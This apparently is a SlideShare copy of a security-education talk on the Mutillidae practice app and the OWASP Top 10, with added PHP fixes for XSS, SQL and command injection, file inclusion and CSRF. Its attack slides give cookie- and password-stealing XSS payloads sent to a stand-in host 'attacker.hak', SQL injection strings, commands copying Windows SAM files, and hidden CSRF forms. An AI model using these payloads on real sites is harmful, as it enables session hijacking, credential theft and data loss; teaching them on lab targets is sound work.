http://Irongeek.com
Adrian Crenshaw
• I run Irongeek.com
• I have an interest in InfoSec education
• I don’t know everything - I’m just a geek with time on my hands
• I’m also not a professional web developer; creating crappy code was easy for me.
• So why listen to me? Sometimes it takes a noob to teach a noob.

• OWASP Top 10
  http://www.owasp.org/index.php/OWASP_Top_Ten_Project
  (As a side note, I’ve copied quite a few of their descriptions and fixes into this presentation)
• Mutillidae
  http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
• Ok, but what are those?

The 2007 list includes:
• A1 - Cross Site Scripting (XSS)
• A2 - Injection Flaws
• A3 - Malicious File Execution
• A4 - Insecure Direct Object Reference
• A5 - Cross Site Request Forgery (CSRF)
• A6 - Information Leakage and Improper Error Handling
• A7 - Broken Authentication and Session Management
• A8 - Insecure Cryptographic Storage
• A9 - Insecure Communications
• A10 - Failure to Restrict URL Access
The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.

• A teaching tool for illustrating the OWASP Top 10
• Written in PHP/MySQL
• Meant to be simpler than WebGoat
• Simple to exploit, just to get the concept across
• Easy to reset
• Includes a “Tips” function to help the student

1. Download Mutillidae
   http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
2. Grab XAMPP Lite and install it
   http://www.apachefriends.org/en/xampp.html
3. Put the Mutillidae files in htdocs
4. You may want to edit xampplite\apache\conf\httpd.conf and set “Listen 127.0.0.1:80” so the deliberately vulnerable app is only reachable from the local machine.

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

• Simple:
  <script>alert("XSS");</script>
• Page Redirect:
  <script>window.location = "http://www.irongeek.com/"</script>
• Cookie Stealing:
  <script>
  new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);
  </script>
• Password Con:
  <script>
  username=prompt('Please enter your username',' ');
  password=prompt('Please enter your password',' ');
  document.write("<img src='http://attacker.hak/catch.php?username="+username+"&password="+password+"'>");
  </script>

• External Javascript:
  <script src="http://ha.ckers.org/xss.js"></script>
• Hot BeEF Injection:
  <script language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>
• How about the User Agent string?

• Mangle XSS to bypass filters:
  http://ha.ckers.org/xss.html
• BeEF browser exploitation framework
  http://www.bindshell.net/tools/beef
• XSS Me Firefox plugin
  https://addons.mozilla.org/en-US/firefox/addon/7598
• Exotic Injection Vectors
  http://www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors

• Input validation.
• Strong output encoding (e.g. htmlspecialchars() in PHP).
• Specify the output encoding.
• Do not use "blacklist" validation to detect XSS in input or to encode output.
• Watch out for canonicalization errors.

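The first three fixes applied to a blog-entry field, as an added PHP example that is not Mutillidae's own code; the rendering functions and the "known good" rule for the field are assumed for the demo:

```php
<?php
// Added example, not Mutillidae's own code: encode untrusted data at the point
// of output and tell the browser which charset the page uses.
declare(strict_types=1);

// Specify the output encoding explicitly so the browser never has to guess
// (charset sniffing is one way encoded output gets reinterpreted). Call this
// before any output is sent.
function sendHtmlHeaders(): void
{
    header('Content-Type: text/html; charset=UTF-8');
}

// Strong output encoding for HTML text nodes and quoted attribute values.
// ENT_QUOTES escapes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string; naming the charset stops
// htmlspecialchars() from depending on the runtime default.
function encodeHtml(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "Accept known good" input validation for the blog entry field (assumed rule
// for this demo): only letters, digits, space and a few punctuation marks.
// This is a whitelist of what the field should contain, not a blacklist of
// tags, so there is nothing for a mangled payload to slip past.
function isValidBlogEntry(string $value): bool
{
    return preg_match('/^[A-Za-z0-9 .,!?_-]{1,200}$/', $value) === 1;
}

// Vulnerable pattern (for contrast): the raw parameter is written into HTML.
function renderEntryVulnerable(string $entry): string
{
    return '<p class="entry">' . $entry . '</p>';
}

// Fixed pattern: validate on the way in, encode on the way out.
// Canonicalization note: PHP decodes the query string once when it fills
// $_GET; validate that value and do not urldecode() it again, or an
// encoded-twice payload is judged on a different string than the one used.
function renderEntryFixed(string $entry): string
{
    if (!isValidBlogEntry($entry)) {
        return '<p class="error">Entry rejected.</p>';
    }
    return '<p class="entry">' . encodeHtml($entry) . '</p>';
}

// Constructed input: the "Simple" payload from the slides.
$payload = '<script>alert("XSS");</script>';

// The first render carries a live <script> element; the second refuses the
// input outright. Even if the validation step were skipped, encodeHtml()
// turns the angle brackets and quotes into entities so the browser shows text.
echo renderEntryVulnerable($payload), PHP_EOL;
echo renderEntryFixed($payload), PHP_EOL;
echo '<p class="entry">' . encodeHtml($payload) . '</p>', PHP_EOL;
```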
Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.

The Code:
  "SELECT * FROM accounts WHERE username='" . $username . "' AND password='" . stripslashes($password) . "'"
or
  echo shell_exec("nslookup " . $targethost);
Expected to fill in the string to:
  SELECT * FROM accounts WHERE username='adrian' AND password='somepassword'
or
  nslookup irongeek.com
But what if the person injected:
  SELECT * FROM accounts WHERE username='adrian' AND password='somepassword' or 1=1 -- '
or
  nslookup irongeek.com && del *.*

• Simple SQL Injection:
  ' or 1=1 --
• Wish I could do this, but can't stack in MySQL/PHP:
  '; DROP TABLE owasp10; --
• Command Injections:
  && dir
  && wmic process list
  && wmic useraccount list
  && copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
• (use ; as a separator if you are running this on Linux)

• SQL Injection Cheat Sheet
  http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
• SQL Injection Attacks by Example
  http://unixwiz.net/techtips/sql-injection.html
• Command Line Kung Fu
  http://blog.commandlinekungfu.com/

• Input validation.
• Use strongly typed parameterized query APIs (bound parameters).
• Enforce least privilege.
• Avoid detailed error messages.
• Show care when using stored procedures.
• Do not use dynamic query interfaces.
• Do not use simple escaping functions.
• Watch out for canonicalization errors.

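The login query and the nslookup call from the code slide, rewritten with bound parameters and accept-known-good validation; this is an added PHP example, not Mutillidae's code, and the accounts table layout and the in-memory SQLite demo database are assumed:

```php
<?php
// Added example, not Mutillidae's own code: the two injectable statements from
// the slides rewritten with bound parameters and "accept known good" input.
declare(strict_types=1);

// Vulnerable pattern from the slides (kept only for contrast): concatenation
// lets  ' or 1=1 --  become part of the WHERE clause.
function buildLoginQueryVulnerable(string $username, string $password): string
{
    return "SELECT * FROM accounts WHERE username='" . $username .
           "' AND password='" . stripslashes($password) . "'";
}

// Fixed: a parameterized query. The SQL text is fixed at prepare() time and
// the values are sent separately, so they can only ever be compared as data.
// (The slides' schema is assumed; hashing the stored password is a separate
// fix under A8 and is not shown here.)
function findAccount(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT username FROM accounts WHERE username = :u AND password = :p'
    );
    $stmt->bindValue(':u', $username, PDO::PARAM_STR);
    $stmt->bindValue(':p', $password, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Command injection fix: accept only a syntactically valid hostname (RFC 1123
// labels) before the value goes anywhere near a shell. Spaces, &&, ; and |
// can never pass this pattern.
function isValidHostname(string $host): bool
{
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return preg_match('/^(?:' . $label . '\.)*' . $label . '$/', $host) === 1;
}

// Validation first, escapeshellarg() as a second layer, and a generic error
// message that does not echo the rejected input back to the user.
function nslookupSafe(string $targethost): string
{
    if (!isValidHostname($targethost)) {
        return 'Invalid hostname.';
    }
    return (string) shell_exec('nslookup ' . escapeshellarg($targethost));
}

// Demo against an in-memory SQLite database with constructed data. The real
// app uses MySQL; the PDO calls above are the same there.
function demo(): void
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE accounts (username TEXT, password TEXT)');
    $db->exec("INSERT INTO accounts VALUES ('adrian', 'somepassword')");

    // Genuine credentials match.
    var_dump(findAccount($db, 'adrian', 'somepassword') !== null);
    // The slides' injection string is compared literally as a password: no match.
    var_dump(findAccount($db, 'adrian', "somepassword' or 1=1 -- ") === null);
    // Contrast: the concatenated query really does contain the injected clause.
    $bad = buildLoginQueryVulnerable('adrian', "x' or 1=1 -- ");
    var_dump(strpos($bad, 'or 1=1') !== false);
    // The command injection string is refused before any shell is involved.
    var_dump(isValidHostname('irongeek.com'));
    var_dump(isValidHostname('irongeek.com && del *.*'));
}

demo();
```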
Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.

• Grabbing a local file:
  http://target.hak/index.php?page=source-viewer.php&php_file_name=config.inc
• Tamper Data, POST data and an inadvertent proxy

• Tamper Data Firefox Plugin
  https://addons.mozilla.org/en-US/firefox/addon/966
• Paros
  http://www.parosproxy.org/index.shtml
• WebScarab
  http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

• Strongly validate user input using "accept known good" as a strategy.
• Add firewall rules to prevent web servers making new connections to external web sites and internal systems.
• Consider implementing a chroot jail or other sandbox mechanisms.
• PHP: Disable allow_url_fopen and allow_url_include in php.ini and consider building PHP locally to not include this functionality.
• PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
• PHP: Ensure that all file and streams functions (stream_*) are carefully vetted.

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.

• You already saw it with the malicious file include demo.

• Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.
• Validate any private object references extensively with an "accept known good" approach.
• Verify authorization to all referenced objects.

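An added PHP example (not Mutillidae's code) covering both the malicious file inclusion fixes and the direct object reference fixes above: "accept known good" resolution of the page= and php_file_name= parameters from the file-inclusion demo, plus an indirect reference map so record keys never appear in a URL. The allow lists and the record id 42 are assumed for the demo.

```php
<?php
// Added example, not Mutillidae's own code: "accept known good" resolution of
// the page= and php_file_name= parameters, plus indirect references for record
// ids so the real keys never appear in a URL. The allow lists are assumed.
declare(strict_types=1);

// Everything index.php is allowed to include. Anything else (../ paths,
// config.inc, remote URLs) is refused before include() is reached. This is the
// whitelist counterpart of allow_url_include=Off in php.ini, not a replacement.
const ALLOWED_PAGES = ['home.php', 'add-to-your-blog.php', 'source-viewer.php'];

// Files the source viewer may display. config.inc is deliberately absent.
const VIEWABLE_SOURCES = ['home.php', 'add-to-your-blog.php'];

// Strict array_search() so type juggling ("0", "") cannot produce a match.
// The return value is the list entry, never the request string, so even an
// accepted value is the server's own copy of it.
function resolvePage(string $requested): ?string
{
    $i = array_search($requested, ALLOWED_PAGES, true);
    return $i === false ? null : ALLOWED_PAGES[$i];
}

function resolveViewableSource(string $requested): ?string
{
    $i = array_search($requested, VIEWABLE_SOURCES, true);
    return $i === false ? null : VIEWABLE_SOURCES[$i];
}

// Indirect object reference: hand the client a random per-session token for a
// record it is authorized to see, and map it back server-side. Guessing
// another record's primary key is useless because the URL never carries keys.
function issueReference(array &$session, int $recordId): string
{
    $token = bin2hex(random_bytes(16));
    $session['refs'][$token] = $recordId;
    return $token;
}

function resolveReference(array $session, string $token): ?int
{
    return $session['refs'][$token] ?? null;
}

function demo(): void
{
    // Known-good page names pass; traversal and the config file do not.
    var_dump(resolvePage('add-to-your-blog.php'));
    var_dump(resolvePage('../config.inc'));
    var_dump(resolveViewableSource('config.inc'));

    // Constructed session: the user may see record 42; the URL only ever
    // carries the token. A raw id sent instead resolves to nothing.
    $session = [];
    $token = issueReference($session, 42);
    var_dump(resolveReference($session, $token));
    var_dump(resolveReference($session, '42'));
}

demo();
```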
A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.

Diagram participants: the client, the target web app, and a website the attacker controls.
1. Session established with the web app via a cookie (already logged in).
2. At some later point, content that the attacker controls is requested.
3. Attacker serves up content that asks the client’s browser to make a request.
4. Client makes the request, and since it already has a session cookie the request is honored.

• Let’s visit a page with this lovely link:
  <img src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">
• Don’t want to use a bad image? Try an iframe:
  <iframe src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy" style="width:0px; height:0px; border: 0px"></iframe>
• Can’t use the GET method? Try something like:
  <html> <body>
  <form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php">
  <input type='hidden' name='input_from_form' value="Test of auto submitted form.">
  </form>
  <script>document.csrfform.submit()</script>
  </body></html>

• CSRF Flaws Found On Major Websites, Including a Bank
  http://it.slashdot.org/article.pl?sid=08/09/30/0136219
• CSRF Home Router Fun
  http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs/
• CSRF in Gmail
  http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

• For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine.
• Do not use GET requests (URLs) for sensitive data or to perform value transactions. (see next point)
• POST alone is insufficient protection.
• Consider adding Captchas and extra session values as hidden form elements.

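The "extra session value as a hidden form element" fix applied to the add-to-your-blog form, as an added PHP example that is not Mutillidae's code; the csrf_token field name and the plain array standing in for $_SESSION are assumptions:

```php
<?php
// Added example, not Mutillidae's own code: a per-session secret carried as a
// hidden form element and checked on every POST to add-to-your-blog.php.
declare(strict_types=1);

// Create (once per session) the extra session value the slides recommend.
// $session stands in for $_SESSION so the demo runs without a web server.
function csrfToken(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Render the form with the token as a hidden field. A page on the attacker's
// site cannot read this value (same-origin policy), so the auto-submitted
// form from the slides arrives without it.
function renderBlogForm(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="index.php?page=add-to-your-blog.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input type="text" name="input_from_form">'
         . '<input type="submit" value="Save">'
         . '</form>';
}

// Server-side check. GET is refused for this state-changing action (no img or
// iframe submissions), POST alone is not enough, and the token comparison
// uses hash_equals() so the check does not leak through timing.
function isGenuineBlogPost(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;
    }
    if (!isset($session['csrf_token'], $post['csrf_token'])) {
        return false;
    }
    if (!is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

function demo(): void
{
    $session = [];                       // constructed stand-in for $_SESSION
    $token = csrfToken($session);

    // 1. The img/iframe trick from the slides: a GET, refused outright.
    var_dump(isGenuineBlogPost('GET', [], $session));

    // 2. The auto-submitted cross-site form: a POST, but without the token.
    var_dump(isGenuineBlogPost('POST',
        ['input_from_form' => 'hi there monkeyboy'], $session));

    // 3. The application's own form: a POST carrying this session's token.
    var_dump(isGenuineBlogPost('POST',
        ['input_from_form' => 'hello', 'csrf_token' => $token], $session));

    echo renderBlogForm($session), PHP_EOL;
}

demo();
```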
• Deliberately Insecure Web Applications For Learning Web App Security
  http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security

• SamuraiWTF
  http://samurai.inguardians.com/
• OWASP Live CD
  http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project
• BackTrack
  http://www.remote-exploit.org/backtrack.html

• Free ISSA classes
• ISSA Meeting
  http://issa-kentuckiana.org/
• Louisville Infosec
  http://www.louisvilleinfosec.com/
• Phreaknic/Notacon/Outerz0ne
  http://phreaknic.info
  http://notacon.org/
  http://www.outerz0ne.org/
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 

Recently uploaded (20)

Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 

Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek

  • 2. http://Irongeek.com
- I run Irongeek.com
- I have an interest in InfoSec education
- I don’t know everything - I’m just a geek with time on my hands
- I’m also not a professional web developer, creating crappy code was easy for me. :)
- So why listen to me? Sometimes it takes a noob to teach a noob.
  • 3.
- OWASP Top 10: http://www.owasp.org/index.php/OWASP_Top_Ten_Project (As a side note, I’ve copied quite a few of their descriptions and fixes into this presentation)
- Mutillidae: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
- Ok, but what are those?
  • 4.
The 2007 list includes:
- A1 - Cross Site Scripting (XSS)
- A2 - Injection Flaws
- A3 - Malicious File Execution
- A4 - Insecure Direct Object Reference
- A5 - Cross Site Request Forgery (CSRF)
- A6 - Information Leakage and Improper Error Handling
- A7 - Broken Authentication and Session Management
- A8 - Insecure Cryptographic Storage
- A9 - Insecure Communications
- A10 - Failure to Restrict URL Access
The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
  • 5.
- A teaching tool for illustrating the OWASP Top 10
- Written in PHP/MySQL
- Meant to be simpler than WebGoat
- Simple to exploit, just to get the concept across
- Easy to reset
- Includes a “Tips” function to help the student
  • 6.
1. Download Mutillidae: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
2. Grab XAMPP Lite and install it: http://www.apachefriends.org/en/xampp.html
3. Put the Mutillidae files in htdocs
4. You may want to edit xampplite\apache\conf\httpd.conf and set “Listen 127.0.0.1:80” so the deliberately vulnerable app is only reachable from the local machine.
  • 7.
XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
  • 8.
- Simple: <script>alert("XSS");</script>
- Page Redirect: <script>window.location = "http://www.irongeek.com/"</script>
- Cookie Stealing: <script>new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);</script>
  • 9.
- Simple: <script>alert("XSS");</script>
- Page Redirect: <script>window.location = "http://www.irongeek.com/"</script>
- Cookie Stealing: <script>new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);</script>
- Password Con: <script>username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src="http://attacker.hak/catch.php?username="+username+"&password="+password+"" >");</script>
  • 10.
- External Javascript: <script src="http://ha.ckers.org/xss.js"></script>
- Hot BeEF Injection: <script language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>
- How about the User Agent string?
  • 11.
- Mangle XSS to bypass filters: http://ha.ckers.org/xss.html
- BeEF browser exploitation framework: http://www.bindshell.net/tools/beef
- XSS Me Firefox plugin: https://addons.mozilla.org/en-US/firefox/addon/7598
- Exotic Injection Vectors: http://www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors
  • 12.
- Input validation.
- Strong output encoding, e.g. htmlspecialchars().
- Specify the output encoding.
- Do not use "blacklist" validation to detect XSS in input or to encode output.
- Watch out for canonicalization errors.
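The fix list above, put into working PHP as an added example (this is not Mutillidae's own code; the function names `h`, `validateName`, `renderUnsafe` and `renderSafe` and the "display name" field are my own assumptions). It pairs the slide's "accept known good" input validation with output-time encoding through htmlspecialchars(), states the character set explicitly, and shows why the raw echo on the left-hand side is the bug:

```php
<?php
// Added example, not from the slides: output encoding and allow-list
// validation for a reflected parameter, following slide 12's fix list.
declare(strict_types=1);

// Encode a string for use inside HTML element content or a double-quoted
// attribute value. Encoding happens at OUTPUT time, and the character set is
// stated explicitly so encoder and browser agree on what a character is.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// "Accept known good" validation for a display-name field: letters, digits,
// spaces and a little punctuation, bounded in length. Anything else is
// rejected outright instead of being "cleaned" with a blacklist of tags.
// The /u modifier makes preg_match() fail on invalid UTF-8, so malformed
// multibyte sequences (a classic canonicalization trick) are rejected too.
function validateName(string $input): ?string
{
    if (preg_match('/^[\p{L}\p{N} .,\'-]{1,64}$/uD', $input) !== 1) {
        return null;
    }
    return $input;
}

// Vulnerable pattern: the raw parameter is echoed straight into the page.
function renderUnsafe(string $name): string
{
    return '<p>Hello, ' . $name . '</p>';
}

// Hardened pattern: validate on the way in, encode on the way out. Even if
// validation were loosened later, the encoding alone keeps markup inert.
function renderSafe(string $name): string
{
    $clean = validateName($name);
    if ($clean === null) {
        $clean = 'visitor';           // fall back to a constant, never to the input
    }
    return '<p>Hello, ' . h($clean) . '</p>';
}

// Constructed sample input: the "Simple" payload from slide 8.
$sample = '<script>alert("XSS");</script>';

header('Content-Type: text/html; charset=UTF-8');   // "specify the output encoding"
echo renderUnsafe($sample), "\n";   // script tag reaches the browser as live markup
echo renderSafe($sample), "\n";     // fails validation, so only "visitor" is rendered
echo renderSafe("O'Brien"), "\n";   // a legitimate apostrophe survives, encoded as &apos;
echo h($sample), "\n";              // encoding alone: &lt;script&gt;alert(&quot;XSS&quot;)... is inert text
```

Run it with the CLI (`php example.php`) and compare the first two output lines: the unsafe renderer emits the `<script>` element verbatim, the safe one never does. Validation and encoding are separate layers on purpose; the slide's "do not use blacklist validation" point is why `validateName` lists what is allowed rather than what is forbidden.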
  • 13.
Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.
  • 14.
The Code:
"SELECT * FROM accounts WHERE username='" . $username . "' AND password='" . stripslashes($password) . "'"
or
echo shell_exec("nslookup " . $targethost);
Expected to fill in the string to:
SELECT * FROM accounts WHERE username='adrian' AND password='somepassword'
or
nslookup irongeek.com
But what if the person injected:
SELECT * FROM accounts WHERE username='adrian' AND password='somepassword' or 1=1 -- '
or
nslookup irongeek.com && del *.*
  • 15.
- Simple SQL Injection: ' or 1=1 --
- Wish I could do this, but can't stack in MySQL/PHP: '; DROP TABLE owasp10; --
- Command Injections: && dir && wmic process list && wmic useraccount list && copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
- (use ; as a separator if you are running this on Linux)
  • 16.
- SQL Injection Cheat Sheet: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
- SQL Injection Attacks by Example: http://unixwiz.net/techtips/sql-injection.html
- Command line Kung Fu: http://blog.commandlinekungfu.com/
  • 17.
- Input validation.
- Use strongly typed parameterized query APIs (bound parameters).
- Enforce least privilege.
- Avoid detailed error messages.
- Show care when using stored procedures.
- Do not use dynamic query interfaces.
- Do not use simple escaping functions.
- Watch out for canonicalization errors.
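Slide 14's two vulnerable lines rewritten the way slide 17 asks, as an added example rather than Mutillidae's own code. The login query uses PDO bound parameters so the SQL text is fixed before any user data is seen; the nslookup call validates the host against an allow-list pattern first and only then passes it through escapeshellarg(). The function names, the `accounts` column names beyond `username`/`password`, and the in-memory SQLite database used for the demo are my assumptions:

```php
<?php
// Added example, not from the slides: slide 14's query and shell call with
// bound parameters and "accept known good" validation (slide 17).
declare(strict_types=1);

// Bound parameters: the statement is parsed with placeholders, so whatever
// arrives in $password can only ever be compared as a value, never parsed
// as SQL. Both values are bound as strings (strongly typed). Note the
// password is compared as stored, as Mutillidae does; hashing it is the
// A8 fix and outside this slide.
function findAccount(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT * FROM accounts WHERE username = :u AND password = :p'
    );
    $stmt->bindValue(':u', $username, PDO::PARAM_STR);
    $stmt->bindValue(':p', $password, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Command injection: validate the host name against what a DNS label may
// contain (letters, digits, hyphens not at either end, dot-separated, at
// most 253 chars), THEN quote it so the shell sees a single argument.
// Validation comes first on purpose: escaping alone is the "simple escaping
// function" slide 17 says not to rely on.
function lookupHost(string $host): string
{
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    if (strlen($host) > 253
        || preg_match('/^' . $label . '(\.' . $label . ')*$/D', $host) !== 1) {
        throw new InvalidArgumentException('Not a valid host name');
    }
    $out = shell_exec('nslookup ' . escapeshellarg($host) . ' 2>&1');
    return is_string($out) ? $out : '';
}

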